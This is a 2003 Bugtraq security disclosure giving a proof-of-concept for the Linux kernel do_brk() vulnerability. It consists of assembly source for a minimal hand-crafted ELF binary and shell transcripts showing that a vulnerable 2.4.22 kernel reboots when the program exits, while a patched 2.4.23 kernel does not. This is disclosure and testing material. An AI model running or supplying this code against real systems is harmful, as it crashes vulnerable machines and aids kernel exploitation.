From: Christophe Devine To: bugtraq-AT-securityfocus.com Subject: Linux kernel do_brk() proof-of-concept exploit code Date: Tue, 2 Dec 2003 03:16:57 +0000 The following program can be used to test if a x86 Linux system is vulnerable to the do_brk() exploit; use at your own risk. $ nasm brk_poc.asm -o a.out $ chmod 755 a.out $ uname -a Linux test3 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unknown unknown GNU/Linux $ ./a.out & [1] 1698 $ cat /proc/`pidof a.out`/maps bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out c0000000-c0003000 rwxp 00000000 00:00 0 (system reboots when the program exits) $ uname -a Linux test3 2.4.23 #1 Mon Dec 1 22:18:25 CET 2003 i686 unknown unknown GNU/Linux $ ./a.out & [1] 1591 $ cat /proc/`pidof a.out`/maps bffff000-c0000000 rwxp 00000000 03:03 376860 /tmp/a.out (the program exits gracefully) $ cat brk_poc.asm ; ref.: http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html BITS 32 org 0xBFFFF000 ehdr: ; Elf32_Ehdr db 0x7F, "ELF", 1, 1, 1 ; e_ident times 9 db 0 dw 2 ; e_type dw 3 ; e_machine dd 1 ; e_version dd _start ; e_entry dd phdr - $$ ; e_phoff dd 0 ; e_shoff dd 0 ; e_flags dw ehdrsize ; e_ehsize dw phdrsize ; e_phentsize dw 1 ; e_phnum dw 0 ; e_shentsize dw 0 ; e_shnum dw 0 ; e_shstrndx ehdrsize equ $ - ehdr phdr: ; Elf32_Phdr dd 1 ; p_type dd 0 ; p_offset dd $$ ; p_vaddr dd $$ ; p_paddr dd filesize ; p_filesz dd 0x4000 ; p_memsz dd 7 ; p_flags dd 0x1000 ; p_align phdrsize equ $ - phdr _start: mov eax, 162 mov ebx, timespec int 0x80 mov eax, 1 mov ebx, 0 int 0x80 timespec dd 20,0 filesize equ $ - $$